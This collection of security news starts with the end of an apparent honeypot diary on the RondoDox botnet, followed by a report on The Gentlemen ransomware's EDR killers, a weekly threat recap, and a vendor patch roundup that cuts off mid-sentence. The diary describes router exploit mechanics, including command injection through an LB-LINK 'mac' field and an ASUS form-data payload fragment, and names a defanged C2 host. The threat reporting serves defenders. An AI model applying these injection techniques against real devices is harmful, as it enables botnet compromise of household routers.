reveals the fileless execution payload: • The Header Spray: Reviewing the JSON logs from the early May events reveals more characteristics of automated broad-spectrum scanning. In addition to dropping the exploit into the User-Agent string, rondo maximized probability of success by forcing the obfuscated exploit into every possible HTTP header: • ShadowRay (CVE-2023-48022): Along with the Tomcat attacks, rondo launched targeted hits against the /api/jobs/ endpoint, mimicking standard interactions via python-requests while deploying the fileless loader payload string rondo.wfh.sh directly into memory: Phase 2: The Infrastructure Shift Source IP: 124.198.131.185 | C2: 204.10.194.134 After the first 8 hits between May 2 and May 3, a clean structural break occurred, and the botnet was silent until May 16, when it resurfaced and fired 5 more hits between May 16 and May 17. While the source IP remained identical, the C2 shifted to a new staging server at hxxp://204[.]10.194.134. rondo also pivoted away from enterprise exploits, firing a succession of command injection attacks at several consumer-grade router interfaces: • LB-LINK Command Injection (CVE-2023-26801): Discovered in March 2023 and still active, this vulnerability allows an attacker to execute commands on the device by sending crafted HTTP POST requests to the /goform/set_LimitClient_cfg URL. By setting the "time1" and "time2" fields to "00:00-00:00" and injecting arbitrary commands into the "mac" field, an attacker may then execute the command chain on the device. •Decoded log payload: • ASUS AsusWRT NVRAM Manipulation (CVE-2018-6000): An unauthenticated attacker may enable a hidden background debugging console by submitting a POST request to the /vpnupload.cgi endpoint, allowing arbitrary command execution. • DShield form data payload: name=\"ateCommand_flag\"\r\n\r\n1 This mid-campaign rotation proves that even commodity botnets possess centralized coordination, updating the configuration of infected edge devices on the fly without needing to re-compromise them. Phase 3: The Residential Drift Source IP: 124.198.131.22 | C2: 204.10.194.134 The final 8 hits of the campaign demonstrate the physical constraints of operating a botnet through consumer hardware. The activity was silent for about 10 days after the last hit on May 17. When it picked back up on May 28, the source IP shifted its last octet to 124.198.131.22, reflecting a standard DHCP lease renewal within the same residential IP pool. Between May 28 and May 29, 8 hits from this new IP targeted two specific endpoints: the legacy Linksys /tmUnblock.cgi interface and the LB-LINK /goform/set_LimitClient_cfg endpoint, drawing payloads from the secondary 204.10.194.134 server. The target is the same /tmUnblock.cgi endpoint seen with r00ts3c. The query string carries the same base64 value: L3RtVW5ibG9jay5jZ2k=, which decodes to /tmUnblock.cgi, pointing to a shared underlying scanner template. The rondo payload, however, is again fileless: After the IP shift, the timing intervals between the final hits were highly irregular, ranging from two to six hours apart and occurred exclusively during local waking hours in Auckland (NZST, UTC+12). 1: RondoDox Phase 3 scanning activity (Source IP: 124.198.131.22) correlated with local waking hours in Auckland, New Zealand (NZST). All of these hits reflect waking household hours in Auckland, with zero overnight activity. Here, the bandwidth constraints, connectivity interruptions, and activity patterns of a real household bleed into the attack data. The device in Auckland is not server infrastructure rondo provisioned. It is a victim, now scanning for more victims exactly like itself. This is the Mirai replication loop in concrete log data: Router gets compromised → router becomes scanner → scanner hunts routers → repeat. The botnet is residential infrastructure, not routed through it. The owner of that Auckland router has no idea that their device spent late May probing a Linksys vulnerability between noon and midnight. The irregular scan timing is simply a household schedule leaking through a compromised gateway. Conclusion: The Depth of the Noise Eeyore was right: the background has a lot to say. Across this 30-day observation window, the commodity threat layer showed that it is not monolithic. To dismiss automated scans as simple background static is to overlook a competitive, multi-tiered system running continuously beneath the surface of normal network activity, a shadow economy with its own supply chains, infrastructure patterns, and operational rhythms. At the surface, we find campaigns like Terrabot and r00ts3c, scanning for and blasting decades old CVEs with flawed scripts and clumsy engineering. Deeply beneath lies RondoDox, aggressively gathering exploits that target a large range of systems, from consumer-grade hardware to enterprise web-servers and AI frameworks, systematically deploying sophisticated fileless exploit chains while running off of compromised home routers [6]. Threat actors are fundamentally efficient. They do not segment their operations into neat "commodity" or "advanced" categories. They use the exact same disposable infrastructure to scan the entire internet, relying on the persistent gap between what our systems check and what they assume. Ultimately, they don't need sophisticated exploits to inflict damage but weaponize simplicity and high-volume automation that outpaces mitigation. For network defenders and analysts, it's important to understand the depth of the noise and how it should be treated. Observing patterns and structural shifts within the static is essential for keeping pace with an automated, multi-directional threat that never stops running. The infrastructure persists, campaigns evolve, payloads update, and the ports keep listening. [1] https://isc.sans.edu/honeypot.html [2] https://www.sans.edu/cyber-security-programs/bachelors-degree/ [3] https://www.socdefenders.ai/threats/07c347ba-6a9c-44bc-956d-5dde426c673d [4] https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ [5] https://www.bitsight.com/blog/rondodox-botnet-infrastructure-analysis [6] https://www.securityweek.com/rondodox-botnet-targeted-174-vulnerabilities/ [7] https://isc.sans.edu/diary/17633 [8] https://www.sentinelone.com/vulnerability-database/cve-2025-34037/ Disclosure: Gemini supported polish and grammar checks, certain technical explanations, and assistance with locating hard-to-find sources. All such links, source material and commands were independently verified, while all research, event discovery and authorship remain my own. ----------- Guy Bruneau IPSS Inc. My GitHub Page Twitter: GuyBruneau gbruneau at isc dot sans dot edu
isc.sans.eduJun 25, 2026extracted
The Gentlemen RaaS Uses GentleKiller EDR Framework Targeting 400 Security Processes
The Gentlemen ransomware-as-a-service (RaaS) operation is actively developing and maintaining a suite of endpoint detection and response (EDR) killers that it hands out to affiliates for impairing system defenses before deploying the encryptor. This mature portfolio of EDR-terminating tools is centered around a framework that's known as GentleKiller. "They also incorporate third-party or leaked tools such as HexKiller, ThrottleBlood, and HavocKiller," ESET security researcher Jakub Souček said in a report shared with The Hacker News. "These tools are standardized through a shared defense-evasion layer, impersonating predominantly security vendors using fake version information, and copied legitimate certificates and icons." The Slovakian cybersecurity company also called out the ransomware crew for its ability to "unusually quickly operationalize" newly disclosed proof-of-concept (PoC) exploits related to an attack technique called bring your own vulnerable driver (BYOVD), in many cases within days of their public release. Since its emergence in March 2025, The Gentlemen has swiftly risen up the ranks and made a name for itself as one of the most active ransomware groups. Per data from Ransomware.live, the group has claimed 504 victims to date, with most of them located in Southeast Asia, South America, and Western Europe. Recent reports from cybersecurity journalist Brian Krebs and PRODAFT have revealed that a 36-year-old Russian national named Alexander Andreevich Yapaev (aka hastalamuerte) has been leading the operation, after acting as an affiliate for other ransomware schemes, including Qilin. ESET has described The Gentlemen as one of the most technically agile RaaS groups, using a set of techniques to ensure that the compiled EDR killer samples sidestep detection. This includes binary protection using Enigma or Themida and using file names that resemble well-known cybersecurity vendors, right down to their version information, digital signatures, and icons. The most prevalent of them is GentleKiller, which comes in eight different variants, each mimicking a different legitimate product and abusing a different vulnerable or malicious driver as part of the BYOVD attack. GentleKiller specifically looks for 400 processes associated with 48 distinct security programs from a number of vendors. The list of drivers exploited by each of the variants is as follows - Kaspersky ("eb.sys") FACEIT Anti-Cheat ("nseckrnl.sys") Valorant ("GameDriverX64.sys") Javelin ("stpm_old.sys" or "stpm_new.sys") WatchDog ("dmx.sys") Network Blocker ("360netmon_wfp.sys") Cleaner ("IMFForceDelete.sys") G11 ("PoisonX.sys") It's worth noting that the abuse of "PoisonX.sys" has been recorded in recent months in connection with two BYOVD attacks, one of which was used to kill CrowdStrike Falcon EDR. A second campaign, detailed by Huntress, involved an intrusion in which unknown threat actors leveraged BeyondTrust Remote Support to successfully deploy ransomware on the network, but not before terminating security tooling via "PoisonX.sys" and "hrwfpdrv.sys." BYOVD attacks like these typically involve introducing vulnerable legitimate drivers into target systems to gain unauthorized kernel-level access and exploit the weakness to perform malicious actions without detection. Most importantly, it requires an attacker to obtain administrative access to the target system. "Once the driver is running in the kernel, the attacker sends Input/Output Control (IOCTL) commands to it," according to Bitdefender. "They either exploit a bug (like a buffer overflow) to execute shellcode, gain arbitrary memory access (read/write), or use "insecure by design" features to manipulate system memory." Because the drivers are signed with a valid Microsoft certificate and run with elevated privileges, the technique abuses the driver trust model to execute arbitrary code at the kernel level and forcibly terminate the protected processes of antivirus and security solutions. "When abstracting away the impersonation layer and the specific drivers used, the underlying code reveals numerous structural and behavioral commonalities that strongly suggest the use of a shared development template," Souček said. "This design prioritizes ease of deployment and operational flexibility for affiliates, while minimizing development effort for the operators. It allows The Gentlemen operators to integrate abused drivers into their toolset very soon after an EDR killer PoC is disclosed." The third-party, BYOVD-based EDR killers employed by the group are below - HexKiller ("googleApiUtil64.sys"), a tool previously assumed to be exclusive to the Warlock ransomware gang ThrottleBlood ("ThrottleBlood.sys"), a tool observed in attacks mounted by MedusaLocker and DragonForce affiliates HavocKiller or HwAudKiller ("havoc.sys") ESET said it also detected a Rust-based credential stealer codenamed OxideHarvest (aka buildx641) that's capable of harvesting data from popular web browsers, including Google Chrome, Microsoft Edge, Torch, Comodo, Epic Privacy Browser, Vivaldi, Brave, Opera, OperaGX, Mozilla Firefox, Waterfox, BlackHawk, and IceCat. "While most ransomware gangs continue to delegate EDR killing to affiliates, Gentlemen has chosen to centralize this function by offering affiliates a ready-to-use, standardized EDR-killer suite," ESET said. "This decision makes Gentlemen an attractive operator for affiliates as it materially lowers the entry barrier for them, making their job consequently easier." The disclosure comes as the CERT Coordination Center (CERT/CC) issued an advisory about multiple vendor-signed UEFI applications being vulnerable to Secure Boot bypass via a BYOVD attack. ESET researcher Martin Smolár has been credited with researching and reporting the vulnerability. The impacted applications are from Acer, AMD, ASUS, ECS, Getac, GIGABYTE, Toshiba, and Uniwill. "If a target system trusts the affected vendor's certificate, an attacker [with administrative privileges or physical access] can exploit these applications to execute arbitrary code during the early pre-boot phase before the operating system initializes," CERT/CC said. "To mitigate this risk, system administrators should apply updates to the UEFI Forbidden Signature Database (DBX) that revoke trust in the affected vendor-signed binaries, preventing these vulnerable applications from executing during the boot process." (The story was updated after publication to include additional details related to the BYOVD technique and its prerequisites.)
thehackernews.comJun 19, 2026extracted
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Monday recap. Same mess, new week. A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times. Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire. Let’s get into it. ⚡ Threat of the Week GitHub Breached via Nx Console VS Code Extension—GitHub officially confirmed that the breach of its internal repositories was the result of a compromise of an employee device involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension. The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to exfiltrate about 3,800 repositories. GitHub said it has taken steps to contain the incident and rotated critical secrets, adding it's continuing to monitor the situation for follow-on activity. The Nx team revealed that the extension, nrwl.angular-console, was breached after one of its developers' systems was hacked in the wake of the recent TanStack supply chain attack. Other companies that were impacted by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs. Grafana Labs was also the target of an extortion attempt, but the company said it refused to pay the hackers who had threatened to release the company's codebase. The incidents are just some examples of the long tail of downstream victims emerging from the Mini Shai-Hulud campaign. This, coupled with TeamPCP's public release of the Shai-Hulud code, marks a significant evolution in software supply chain threats, as it gives attackers a ready-made blueprint for fleshing out similar worms targeting open-source repositories and developer environments. 80% of Security Teams Know OAuth Security Is Urgent. Half Are Doing Nothing Manual OAuth reviews don’t scale, and the rapid adoption of AI agents is making it worse. Material’s OAuth Threat Remediation Agent continuously monitors every connection across your cloud workspace, classifies risk, and automatically kills malicious ones before they become incidents. Close the Gap Today ➝ 🔔 Top News Microsoft Took Down Fox Tempest—Microsoft has cracked down on Fox Tempest, a cyber threat actor that fueled Rhysida ransomware attacks and other infections involving Oyster, Lumma Stealer, and Vidar. The group operates upstream in the malware and ransomware supply chain, acting as an enabler and providing tools for other threat actors to carry out attacks. This included a fraudulent code-signing service that let cybercriminals deploy malware "through the front door" without being detected. While bad actors have been known to resell code-signing certificates for at least a decade, Fox Tempest's operation stood out because it provided a scalable service for extortion, phishing, SEO poisoning, or malware-laced advertising. 9-Year-Old Linux Kernel Flaw Enables Root Command Execution—A new vulnerability disclosed in the Linux kernel remained undetected for nine years. The vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case of improper privilege management that could permit an unprivileged local user to disclose sensitive files and execute arbitrary commands as root on default installations of several major distributions like Debian, Fedora, and Ubuntu. The issue was introduced in November 2016. Microsoft Warned of Two Actively Exploited Defender Vulnerabilities—Microsoft has disclosed that a privilege escalation and a denial-of-service flaw in Defender have come under active exploitation in the wild. While CVE-2026-41091 could allow an attacker to gain SYSTEM privileges, CVE-2026-45498 relates to a case of denial-of-service. Although Microsoft has not formally confirmed, the vulnerability descriptions for CVE-2026-41091 and CVE-2026-45498 overlap with those of RedSun and UnDefend, two Defender zero-days that were disclosed by Chaotic Eclipse (aka Nightmare-Eclipse) last month. Newly Disclosed Drupal Core Flaw Under Attack—A critical security flaw impacting Drupal Core has come under active exploitation within days of public disclosure. The vulnerability in question is CVE-2026-9082 (CVSS score: 6.5), an SQL injection vulnerability affecting all supported versions of Drupal Core. Drupal acknowledged that "exploit attempts are now being detected in the wild." Thales-owned Imperva said it has observed over 15,000 attack attempts targeting almost 6,000 individual sites across 65 countries. Claude Mythos AI Finds 10K High-Severity Flaws in Popular Software—Anthropic revealed that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most "systemically" important software across the world since the cybersecurity initiative went live last month. Of these vulnerabilities, 6,202 have been classified as high- or critical-severity flaws impacting more than 1,000 open-source projects. Subsequent analysis of these vulnerability candidates has identified that 1,726 are valid true positives. As many as 1,094 flaws are assessed to be either high- or critical-severity. In total, these efforts have led to 97 findings being patched upstream and 88 advisories being issued. Cisco Patched CVSS 10.0 Secure Workload Flaw—Cisco rolled out updates for a maximum-severity security flaw impacting Secure Workload that could allow an unauthenticated, remote attacker to access sensitive data. Tracked as CVE-2026-20223 (CVSS score: 10.0), the vulnerability arises from insufficient validation and authentication when accessing REST API endpoints. "An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint," Cisco said. "A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user." Microsoft Released Mitigations for YellowKey—Microsoft released a mitigation for a BitLocker bypass vulnerability named YellowKey following its public disclosure last week. The zero-day flaw, now tracked as CVE-2026-45585, carries a CVSS score of 6.8. It has been described as a BitLocker security feature bypass. The issue impacts Windows 11 version 26H1 for x64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows 11 Version 25H2 for x64-based Systems, Windows Server 2025, and Windows Server 2025 (Server Core installation). Microsoft noted that successful exploitation could permit an attacker with physical access to sidestep the BitLocker Device Encryption feature on the system storage device and gain access to encrypted data. 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-48172 (LiteSpeed User-End cPanel Plugin), CVE-2026-34926 (Trend Micro Apex One), CVE-2026-20223 (Cisco Secure Workload), CVE-2026-41091, CVE-2026-45498, CVE-2026-45584 (Microsoft Defender), CVE-2026-46333 (Linux Kernel), CVE-2026-9082 (Drupal Core), CVE-2026-45585 (Microsoft Windows BitLocker), CVE-2026-2743 (SEPPMail), CVE-2026-7301, CVE-2026-7302, CVE-2026-7304 (SGLang), CVE-2026-29205 (cPanel), CVE-2026-8178 (Amazon Redshift JDBC driver), CVE-2026-8053 (MongoDB), CVE-2026-45829 aka ChromaToast (ChromaDB), CVE-2026-8153 (Universal Robots PolyScope 5), CVE-2026-3102 (ExifTool), CVE-2026-9110, CVE-2026-9111, from CVE-2026-8511 through CVE-2026-8522 (Google Chrome), CVE-2026-45434 (Apache OFBiz), CVE-2026-33000, CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-34911 (UniFi OS), CVE-2026-45401 (Open WebUI), CVE-2026-9256, CVE‑2026‑8711 (F5 NGINX Plus and NGINX Open Source), CVE-2026-20239 (Splunk Enterprise and Splunk Cloud Platform), CVE-2026-46376 (FreePBX), CVE‑2026‑6637 (PostgreSQL), and CVE-2026-35194 (Apache Flink). 🎥 Cybersecurity Webinars Learn How Attackers Use AI to Supercharge DDoS Efficiency (and How to Stop It) → Adversaries are weaponizing AI to exploit network blind spots, auto-generate evasion scripts, and bypass traditional defenses with surgical precision. This webinar bridges the gap between AI-driven exploitation and cloud resilience, offering data-driven insights into how attackers maximize DDoS success rates. Join us to move beyond theory, leverage AI for non-disruptive security testing (CTEM), and transition your team from reactive mitigation to automated, continuous resilience. Beyond the Zero-Day: Hunting for Threats That Don't Need an Exploit → Zero-day exploits are no longer the ultimate metric of cyber risk. Today, sophisticated adversaries bypass traditional defenses entirely by leveraging identity flaws, living-off-the-land techniques, and AI automation that don't rely on unpatched software. This session moves beyond the zero-day obsession to expose how attackers operationalize modern post-compromise tactics—and how security teams can pivot from reactive patching to proactive, behavioral threat hunting. 📰 Around the Cyber World Vulnerability Exploitation Overtakes Compromised Credentials in a Long Time —Vulnerability exploitation has overtaken compromised credentials for the first time in nearly two decades as the most common initial access vector for data breaches, per Verizon. Nearly a third (31%) of data breaches over the past year started with vulnerability exploitation, up from 20% in 2024. Credential abuse declined from 22% to 13%. What's more, only 26% of critical vulnerabilities listed in the U.S. Cybersecurity Infrastructure and Security Agency Known Exploited Vulnerabilities (KEV) catalog were fully remediated by organizations in 2025, a drop from 38% the previous year. "The median time for full resolution went up to 43 days, almost two weeks more than the previous year’s 32 days," the report said. "In the median case, organizations had 50% more critical vulnerabilities to patch in this year’s reporting dataset compared to the previous year." Ransomware accounted for 48% of all breaches last year, up from 44% in 2024. But in a positive development, ransom payments have continued to decline, with the median payment sliding from $150,000 in 2024 to almost $140,000. Attackers Go After India's Education Ecosystem —Threat actors are abusing student data within India's education ecosystem, spanning educational institutions, third-party vendors, and online services, for phishing, impersonation, social engineering, and financially motivated fraud operations. "Attackers commonly leverage exposed or misused student information to create highly convincing scams related to admissions, scholarships, internships, fee payments, and academic services," CYFIRMA said. "In several instances, threat actors exploited trusted educational branding, fraudulent portals, and insider access to obtain credentials, financial information, or direct payments. Additionally, some cases indicated the misuse of student-linked bank accounts within broader fraud and mule account operations." RondoDox Adds ASUS Router Flaw to its Arsenal —The operators of the RondoDox botnet have incorporated CVE-2018-5999 (CVSS score: 9.8), a critical ASUS router flaw, to their arsenal, marking the first observation of in-the-wild exploitation of the vulnerability. The activity was first detected on May 17, 2026, against its honeypots. "The attack pattern: payloads that set the ateCommand_flag to 1, enabling the infosvr interface to accept arbitrary configuration changes," VulnCheck CTO Jacob Baines said in a post on LinkedIn. Fake Microsoft Teams Sites Deliver ValleyRAT —Fake Microsoft Teams distribution sites shared on X are being used to trick unsuspecting users into downloading a trojanized installer packaged as a ZIP archive, ultimately leading to the deployment of ValleyRAT, a malware associated with a Chinese cybercrime group called Silver Fox. "The delivered payload leverages a DLL sideloading chain via a legitimate executable (GameBox.exe) developed by Tencent, ultimately deploying a ValleyRAT variant," K7 Labs said. "This malware campaign stands out for its clean execution chain, combining social engineering with staged payload delivery, in-memory decryption, and stealthy persistence mechanisms." Malicious Activity Targeting Malaysian Entities —An attacker-controlled infrastructure hosted on Microsoft Azure infrastructure in the Malaysia West region has been used to conduct a targeted intrusion campaign against multiple Malaysian organizations, per Oasis Security. "The operation demonstrates a high degree of operational planning, with the attacker developing purpose-built Python tooling for each target — covering internal network enumeration, database access, and external data exfiltration," the company said. The infrastructure hosts target-specific Python scripts, webshell deployment tools, a Laravel remote code execution exploit chain, and source code for custom command-and-control (C2) components. Texas Attorney General Sues Meta Over WhatsApp Encryption Claims —The Texas Attorney General has sued Meta over allegations that the company's WhatsApp messenger doesn't provide the end-to-end encryption (E2EE) it has long claimed. "Reports suggest that employees of WhatsApp have been able to access user communications," the Office of the Texas Attorney General said. "Additional reporting and investigations indicate that message content can be pulled and viewed after the message has been sent. This is a complete and total misrepresentation of Meta’s privacy policies." The lawsuit hinges on a report from Bloomberg from last month about how the U.S. Commerce Department's Bureau of Industry and Security had abruptly closed an investigation into allegations that Meta could access encrypted WhatsApp messages. Preliminary findings from the department claimed that "there is no limit to the type of WhatsApp message that can be viewed by Meta." Meta has called the allegations "baseless." FIOD Arrests Two in Connection with Stark Industries —The Netherlands Fiscal Intelligence and Investigation Service (FIOD) arrested two men and seized 800 servers in connection with a web hosting company that enabled cyber attacks, interference operations, and disinformation campaigns. The arrested individuals included a 57-year-old man from Amsterdam and a 39-year-old man from The Hague. Although the name of the company was not explicitly mentioned, it is assessed to be Stark Industries, which was sanctioned by the E.U. in May 2025. Following the sanctions, a significant chunk of the technical infrastructure was transferred to a Dutch-based entity known as THE.Hosting aka WorkTitans. "This new company actually acts as a cover for the sanctioned entities," FIOD said. "The director and (indirect) sole shareholder of this company is the 57-year-old suspect." A second unnamed Dutch company is said to have played a facilitating role. "This company, of which the 39-year-old is a suspected director and sole shareholder, ensures that the servers of the former new company are connected to the internet," FIOD added. UNG0002 Targets Chinese Educational Sector —The Chinese educational sector has become the target of a new campaign conducted by UNG0002 as part of a spear-phishing campaign codenamed Operation Dragon Whistle. "What makes this campaign particularly effective is the precision of its social engineering," Seqrite Labs said. "The threat actor did not use a generic lure — they specifically identified that Changzhou University conducts mandatory annual fitness assessments where failure directly impacts graduation eligibility. This creates an environment of urgency and compliance that significantly increases the probability of victim engagement." The emails have been found to distribute ZIP archives that ultimately lead to the deployment of Cobalt Strike Beacon. Void Botnet Uses Ethereum Smart Contracts for C2 —A new botnet malware called Void Botnet uses Ethereum smart contracts for seizure-resistant command-and-control (C2). It's a Rust-based malware that's advertised on cybercrime forums by a developer operating under the handle TheVoidStl. "Based on the seller's documentation and panel screenshots, Void Botnet is a Rust-native loader with two command-and-control modes in the same binary," Qrator Labs said. "The first mode routes commands through Ethereum smart contracts: the operator writes instructions to a contract, and infected machines check it at regular intervals, picking up new tasks within three to five minutes. The second mode connects machines directly to the operator's web panel, with tasks completing in under thirty seconds. The operator switches between them at any time by updating the contract." The botnet works by writing commands to smart contracts, bots polling public RPC endpoints, and C2 infrastructure that is hard to take down. Proton Debuts AI Access Tokens in Proton Pass —Proton Pass, a secure, end-to-end encrypted (E2EE) password manager, has added credential sharing through AI access tokens, allowing users to give AI agents access to items it's permissioned to and monitor their activity. "AI access tokens are our newest secure sharing option to bring password management into the age of agentic AI," Proton said. "Every time an AI agent uses an access token, this is logged, and a reason for the access must be provided. For extra security, you can also set an expiration for each token, from one hour to one year, after which it can no longer be used." DevilNFC and NFCMultiPay Android NFC Relay Malware Spotted —Two new Android NFC relay malware families named DevilNFC and NFCMultiPay have been observed targeting European and LATAM banking customers. "These two NFC relay toolkits are being developed and operated outside the Chinese-speaking MaaS ecosystem: DevilNFC carries an exclusively Spanish-speaking attribution, while NFCMultiPay's developer fingerprint is Portuguese (Brazilian)," Cleafy said. "Local groups are no longer buying access to Chinese platforms; they are building their own." It's assessed that the malware families may have been developed with assistance using generative artificial intelligence (AI). Both malware families are designed to collect the victim's card PIN. "DevilNFC further locks the victim inside the malicious interface via Kiosk Mode, preventing any escape while the relay completes," the Italian company said. "DevilNFC employs an asymmetric architecture in which a single APK serves both roles in a relay attack: a passive reader on the victim's device and a system-level card emulator on the attacker's rooted device, achieved via a hooking framework that intercepts NFC traffic below the Android API layer." DevilNFC overlaps with an NGate variant documented by ESET last month. The malicious apps are distributed via SMS or WhatsApp messages, directing victims to fake landing pages impersonating Google Play Store listings. TAX#TRIDENT Uses Indian Income Tax Lures —A new campaign dubbed TAX#TRIDENT is using Indian Income Tax-themed lures to target Windows endpoints via three delivery paths. The campaign starts with fake tax assessment lures and then moves victims toward ZIP files, VBScript downloaders, or PHP-looking web endpoints that actually return script content," Securonix said. "The first branch uses a ZIP file and a signed ClientSetup installer. Once executed, the installer creates a hidden client tree, adds service and driver persistence, and starts network communication. The second branch uses 'Assessment_Order.vbs.' The script shows a tax assessment decoy image, downloads the same ClientSetup payload, writes a new 'YTSysConfig.ini,' and runs the payload hidden. The third branch uses a PHP-looking endpoint that returns VBScript. That script downloads more stages from S3, disguises a VBS file as a PNG image, changes UAC prompt behavior, and silently installs a signed ManageEngine UEMS / Endpoint Central agent." CISA Launches KEV Nomination Form to Report Exploited Bugs —The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has introduced an online Nomination Form that lets researchers, vendors, and industry partners submit known exploited vulnerabilities (KEVs) directly so as to "quickly identify, validate, and share KEVs, critical threat information." Exploitation of Four-Faith Router Flaw —Attackers are exploiting CVE-2024-9643 (CVSS score: 9.8), a critical authentication bypass flaw in Four-Faith F3x36 industrial cellular routers, as part of a large-scale campaign since mid-May 2026 to turn fold compromised devices into botnets for further campaigns. CrowdSec said it has observed 139 attacking IP addresses through May 18, 2026. "Exploitation was first observed on April 20 and escalated to the point of being reclassified as mass exploitation on May 12, a strong signal that attackers are operationalizing this flaw at scale," it added. Chinese-Language PhaaS Ecosystem Detailed —An analysis of a dozen current phishing-as-a-service (PhaaS) offerings in the Chinese underground has found that they have shifted away from static password harvesting towards real-time interception and tokenization via live administration panels, allowing attackers to capture one-time passcodes (OTPs) and bypass multifactor authentication (MFA) instantly. The services, such as YY Lai Yu, primarily target non-Chinese entities, with advertisements regularly posted to Telegram rather than channels such as WeChat (Weixin) or Tencent QQ. A crucial aspect of these operations is their exploitation of digital wallet provisioning to monetize stolen payment details. Attackers have been found to leverage captured credentials and OTPs to provision the victim's card into a digital wallet on an attacker-controlled device. Once tokenized, the card can be used for high-value transactions, contactless payments, and ATM withdrawals. "Instead of simply gaining account access, these operations focus on exploiting digital wallet provisioning to transform stolen payment data into tokenized assets within ecosystems," Google said. "This shift—combined with the use of encrypted delivery channels like RCS and iMessage to bypass traditional carrier security filters on SMS messages—represents an emerging development where the goal is no longer just a login, but securing direct, unauthorized control over a victim's financial accounts." 🔧 Cybersecurity Tools Bumblebee → It is an open-source security tool for macOS and Linux designed to find software supply-chain vulnerabilities on developer computers. It acts as a lightweight, read-only scanner that audits metadata files, manifests, and configurations rather than executing code. This allows it to safely check local language packages, web browser extensions, text editor add-ons, and AI tool configurations for known security exposures without running potentially malicious install scripts. Claude-BugHunter → It is an open-source add-on that configures Anthropic’s Claude Code command-line tool into a specialized security assistant. It equips the AI with pre-built vulnerability patterns, attack techniques, and reporting templates, automating the process of finding and documenting security flaws during authorized testing. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion Patch the easy stuff before it becomes a bigger problem next week. The old bugs everyone ignored? Attackers didn’t ignore them. They never do. Right now, the internet feels held together with tape and luck. Every week, there’s a new mess, a new scam, or some old box getting dragged into a botnet. See you next Monday.
thehackernews.comMay 25, 2026extracted
Ivanti, Fortinet, SAP, VMware, n8n Patch RCE, SQL Injection, Privilege Escalation Flaws
Ivanti, Fortinet, n8n, SAP, and VMware have released security fixes for various vulnerabilities that could be exploited by bad actors to bypass authentication and execute arbitrary code. Topping the list is a critical flaw impacting Ivanti Xtraction (CVE-2026-8043, CVSS score: 9.6) that could be exploited to achieve information disclosure or client-side attacks. "External control of a file name in Ivanti Xtraction before version 2026.2 allows a remote authenticated attacker to read sensitive files and write arbitrary HTML files to a web directory, leading to information disclosure and possible client-side attacks," Ivanti said in an advisory. Fortinet published advisories for two critical shortcomings affecting FortiAuthenticator and FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS that could result in code execution - CVE-2026-44277 (CVSS score: 9.1) - An improper access control vulnerability in FortiAuthenticator that may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests. (Fixed in FortiAuthenticator versions 6.5.7, 6.6.9, and 8.0.3) CVE-2026-26083 (CVSS score: 9.1) - A missing authorization vulnerability in FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS WEB UI that may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests. (Fixed in FortiSandbox versions 4.4.9 and 5.0.2, FortiSandbox Cloud version 5.0.6, and FortiSandbox PaaS versions 4.4.9. and 5.0.2) SAP also shipped fixes for two critical vulnerabilities - CVE-2026-34260 (CVSS score: 9.6) - An SQL injection vulnerability in SAP S/4HANA CVE-2026-34263 (CVSS score: 9.6) - A missing authentication check in the SAP Commerce cloud configuration "The vulnerability is caused by an overly permissive security configuration with improper rule ordering, allowing an unauthenticated user to perform malicious configuration upload and code injection, resulting in arbitrary server-side code execution," Onapsis said about CVE-2026-34263. On the other hand, CVE-2026-34260 could be exploited by an attacker to inject malicious SQL statements and potentially impact the confidentiality and availability of the application. However, since the affected code only allows read access to data, the vulnerability does not compromise the integrity of the application. "It allows a low-privileged, authenticated attacker to inject malicious SQL code via user-controlled input, potentially exposing sensitive database information and crashing the application," Pathlock said. Patches have also been released by Broadcom for a high-severity flaw in VMware Fusion (CVE-2026-41702, CVSS score: 7.8) that could pave the way for local privilege escalation. The issue has been addressed in version 26H1. "VMware Fusion contains a TOCTOU (Time-of-check Time-of-use) vulnerability that occurs during an operation performed by a SETUID binary," Broadcom said. "A malicious actor with local non-administrative user privileges may exploit this vulnerability to escalate privileges to root on the system where Fusion is installed." Round off the list is a set of five critical vulnerabilities impacting n8n - CVE-2026-42231 (CVSS score: 9.4) - A vulnerability in the xml2js library used to parse XML request bodies in n8n's webhook handler that allows prototype pollution via a crafted XML payload, enabling an authenticated user with permission to create or modify workflows to achieve remote code execution on the n8n host. (Fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1) CVE-2026-42232 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could achieve global prototype pollution via the XML Node, leading to remote code execution when combined with other nodes exploiting the prototype pollution. (Fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1) CVE-2026-44791 (CVSS score: 9.4) - A bypass for CVE-2026-42232 that could result in remote code execution on the n8n host. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) CVE-2026-44789 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could achieve global prototype pollution via an unvalidated pagination parameter in the HTTP 